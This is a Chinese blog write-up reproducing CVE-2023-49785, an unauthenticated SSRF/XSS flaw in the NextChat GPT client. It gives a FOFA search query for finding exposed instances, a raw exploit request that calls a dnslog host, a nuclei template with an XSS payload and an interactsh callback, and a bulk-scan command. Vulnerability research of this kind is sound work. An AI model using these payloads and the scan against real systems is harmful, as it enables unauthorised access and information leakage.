CVE-2023-49785漏洞复现

Administrator 字数: 4524 阅读耗时: 11 分钟 2024/06/26 博客独享热度: 28 评论: 0

免责申明：本文内容为学习笔记分享，仅供技术学习参考，请勿用作违法用途，任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失，均由使用者本人负责，与本平台和发布者作者无关！！！

漏洞名称

NextChat cors SSRF 漏洞

漏洞影响

NextChat

漏洞描述

NextChat 是一个面向用户的GPT类应用程序，用户可以通过这个程序与GPT进行交互。2024年3月，互联网上披露CVE-2023-49785 NextChat cors SSRF 漏洞，攻击者可在无需登陆的情况下构造恶意请求造成SSRF，造成敏感信息泄漏等。

FOFA搜索语句

title="NextChat"

漏洞复现

SSRF漏洞复现通常使用DNSlog方式，向靶场发送如下数据包，请求dnslog的url，其中URL中kr9dqoau.dnslog.pw是dnslog地址

GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

向靶场发包之后DNSLOG能看到访问记录

漏洞复现成功

批量漏洞扫描 poc

nuclei poc文件内容如下


id: CVE-2023-49785

info:
  name: ChatGPT-Next-Web - SSRF/XSS
  author: high
  severity: critical
  description: |
    Full-Read SSRF/XSS in NextChat, aka ChatGPT-Next-Web
  remediation: |
    Do not expose to the Internet
  reference:
    - https://www.horizon3.ai/attack-research/attack-blogs/nextchat-an-ai-chatbot-that-lets-you-talk-to-anyone-you-want-to/
    - https://github.com/ChatGPTNextWeb/ChatGPT-Next-Web
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 9.1
    cve-id: CVE-2023-49785
  metadata:
    max-request: 1
    shodan-query: title:NextChat,"ChatGPT Next Web"
    verified: true
  tags: cve,cve2023,ssrf,xss,chatgpt,nextchat

http:
  - method: GET
    path:
      - "{{BaseURL}}/api/cors/data:text%2fhtml;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+%23"
      - "{{BaseURL}}/api/cors/http:%2f%2fnextchat.{{interactsh-url}}%23"

    matchers-condition: or
    matchers:
      - type: dsl
        dsl:
          - contains(body_1, "<script>alert(document.domain)</script>")
          - contains(header_1, "text/html")
        condition: and

      - type: dsl
        dsl:
          - contains(header_2,'X-Interactsh-Version')
          - contains(interactsh_protocol_2,'dns')
        condition: and

运行POC

nuclei.exe -t mypoc/cve/CVE-2023-49785.yaml -l data/NextChat.txt

修复建议

该漏洞EXP已公开传播，漏洞利用成本极低，建议您立即关注并修复。

1、升级至最新版本。
2、利用安全组设置其仅对可信地址开放。